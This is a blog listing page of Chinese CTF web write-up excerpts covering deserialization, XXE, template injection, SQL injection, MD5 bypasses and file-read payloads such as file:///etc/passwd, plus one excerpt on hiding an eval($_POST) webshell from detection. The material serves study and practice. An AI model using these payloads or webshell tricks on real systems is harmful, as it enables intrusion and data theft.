CTF
文章平均质量分 55
H3h3QAQ
我是小菜鸡QAQ
展开
-
php反序列化漏洞基础
PHP序列化与序列化作者:H3h3QAQ一、PHP序列化和反序列化1.PHP反序列化:serialize()将变量或者对象转换成字符串的过程,用于存储或传递PHP的值的过程种,同时不丢失其类型和结构常见的序列化字母表示及其含义:a - array ----->a:<n>:{<key 1><value 1>...<key n><value n>}b - boolean ----->b:<digit>d原创 2021-08-31 11:41:19 · 1009 阅读 · 0 评论 -
最近做的题的wp
variacover主要考点是变量覆盖<meta charset="utf-8"><?phperror_reporting(0);if (empty($_GET['b'])) { show_source(__FILE__); die();}else{ include('flag.php');$a = "www.XMAN.com";$b = $_GET['b'];@parse_str($b);if ($a[0] != 'QNKCDZO' &原创 2021-08-18 15:04:17 · 648 阅读 · 1 评论 -
[GKCTF2021]easycms
[GKCTF2021]easycms扫到admin.php官方提示了,后台密码为5位数字的,盲猜账号admin密码12345登录到后台点击:设计->导出主题->保存然后复制下载的主题的链接http://caf73c4b-734b-495b-b898-dc46661beb7f.node4.buuoj.cn/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2R原创 2021-07-16 23:43:03 · 1390 阅读 · 2 评论 -
[NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbookXML实体注入原理参考https://www.freebuf.com/vuls/175451.html学习链接https://xz.aliyun.com/t/6887#toc-2看题目可知是XXE攻击抓一下包客户端向服务器发送XML数据我们抓包可以控制整个数据,添加一个恶意代码,进行攻击抓包看到 username和password都是xml格式我们来构造payload来试着读取flag<?xml version="1.0"原创 2021-06-08 12:32:48 · 116 阅读 · 0 评论 -
[BJDCTF2020]The mystery of ip
[BJDCTF2020]The mystery of ip打开flag.php发现有ip初步怀疑与X-Forwarded-For发现ip可控可能存在模板注入看了文章发现是Smarty模板注入https://blog.csdn.net/qq_45521281/article/details/107556915随即构造一下payload查看目录发现flag.php 直接cat!发现并不是真的flag<?php require_once('header.php');原创 2021-05-26 12:37:57 · 558 阅读 · 7 评论 -
[GXYCTF2019]禁止套娃
[GXYCTF2019]禁止套娃老套路扫一下目录用dirsearch 可以扫到/.git(我第一次扫到了,第二次就没扫到了)问了一下师傅,知道是.git源码泄露利用工具GitHack拿index.php发现eval来看一下这么多if第一个if 常用的伪协议都被ban了第二个if是正则匹配,?R表示引用当前表达式,所以一个合法的表达式可以是a(b();),括号和字符组成的,第三个if就过滤一些字眼。试着报一下目录利用scandir()看到要使用scandir()必须需要一个direc原创 2021-05-26 12:17:59 · 318 阅读 · 0 评论 -
广东省省赛复现
Webold拿到题目F12 发现了这个感觉会有任意文件读取尝试随机读取一个文件,构造payload:/openStream?url=file:///etc/passwd真读取到了文件一般flag都在根目录,所以试一下/openStream?url=file:///flag.txt没有反应,随即去url编码再试一下/openStream?url=file:///%25%36%36%25%36%63%25%36%31%25%36%37%25%32%65%25%37%34%25%37%原创 2021-05-26 11:32:40 · 214 阅读 · 1 评论 -
[BUUCTF 2018]Online Tool
[BUUCTF 2018]Online Tool打开就是PHP代码<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_GET['host'];原创 2021-05-22 21:04:58 · 118 阅读 · 5 评论 -
[CISCN 2021] 部分 write up
easy_source抓包扫目录干都干了,发现什么都拿不到预期猜测flag在注释里(也给了提示):你能发现我嘛所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释:参考自https://r0yanx.com/2020/10/28/fslh-writeup/payload如下:?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment因为不知道到底在那个函数中,随即手工爆破直到拿到flag原创 2021-05-16 14:42:48 · 843 阅读 · 6 评论 -
[GYCTF2020]Blacklist&说说真心话
[GYCTF2020]Blacklist&说说真心话今天没课,就来刷刷题对于我来说sql注入题一直是菜鸡,正好BUU还有几道题没做(我是菜鸡呜呜呜)就来做一下[GYCTF2020]Blacklist然后整理一下打开靶机:发现跟[强网杯 2019]随便注很像我就试了是:先爆一下列1' order by 3;# 到4的时候报错,所以证明只有三列然后试一下是否存在堆叠注入,试一下payload:1';show databases;#存在堆叠注入接着构造payload:1原创 2021-05-14 18:11:00 · 263 阅读 · 0 评论 -
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it看群里说CTFHub上复现了, 我来看看本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了只能想想其他办法咯<?php#Really easy...$file=fopen("flag.php","r") or die("Unable 2 open!");$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(原创 2021-05-12 19:28:25 · 2878 阅读 · 16 评论 -
[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag
[HCTF 2018]WarmUp打开之后硕大的一张滑稽F12一下看看有没有提示发现了source.php得到了一串PHP<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hi原创 2021-05-11 10:45:31 · 382 阅读 · 3 评论 -
[2021红帽杯]Web writeup
find_it老套路扫一下目录貌似只有君子协定有用,打开看看When I was a child,I also like to read Robots.txtHere is what you want:1ndexx.php打开1ndexx.php 发现打不开,尝试一下是否有备份/.1ndexx.php.swp发现了一串代码:<?php $link = mysql_connect('localhost', 'root'); ?><html><hea原创 2021-05-10 18:44:31 · 1763 阅读 · 21 评论 -
[2021 蓝帽杯\]one_Pointer_php 复现
#[2021 蓝帽杯]one_Pointer_php 复现题目给了两个源码:user.php:<?phpclass User{ public $count;}?>只是定义了一个user类而已add_api.php:<?phpinclude "user.php";if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user->cou原创 2021-05-07 14:26:16 · 1260 阅读 · 16 评论 -
[网鼎杯 2020 朱雀组]phpweb
打开靶机,开幕雷击(单压 X1 )然后就在不停的疯狂刷新,burp抓包一下。php date(format):格式化日期和时间,并返回格式化的日期字符串。PS:在这插入php探针会返回Hacker…看到可以利用的函数,构造payload:file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。func=file_get_contents&p=index.php得到以下代码:<?ph原创 2021-05-05 22:46:51 · 137 阅读 · 4 评论 -
[MRCTF2020]Ez_bypass
[MRCTF2020]Ez_bypass打开后是一串PHP代码I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &原创 2021-05-05 22:45:52 · 140 阅读 · 2 评论 -
一句话木马
#一句话木马传统防护检测的的免杀方法:一、隐藏关键字绕过php代码标志<?的限制:<script language="php">@eval($_POST['x'])</script>拆分拼接:<?php$arr=explode(",","a,s,d,f,s,d,e,k,r,t"); //把字符串打散为数组$payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert//php版本原创 2021-05-05 22:43:29 · 370 阅读 · 2 评论 -
[BJDCTF2020]Easy MD5
打开之后这个这破玩意抓一下包发现了这个select * from ‘admin’ where password=md5($pass,true)百度了一下MD5()ture漏洞https://blog.csdn.net/March97/article/details/81222922输入一下百度到的密码:ffifdyop进入了另一个页面,注释里发现了:<!--$a = $GET['a'];$b = $_GET['b'];if($a != $b && m原创 2021-05-01 22:43:37 · 236 阅读 · 0 评论 -
[强网杯 2019]随便注 & BUUCTF[ACTF2020 新生赛]Exec
[强网杯 2019]随便注打开靶机后只有一个输入框,是一道注入题1' or 1=1;##是用来注释掉后面得sql语句再输入:1' order by 2;# 1' order by 3;# 输入到3 时报错了,证明只有两列:输入1'; show tables;#可以看到有 1919810931114514 和 words 两个表进入看看有什么输入0'; show columns from `words`;#0'; show columns from `19198原创 2021-04-28 16:04:00 · 192 阅读 · 0 评论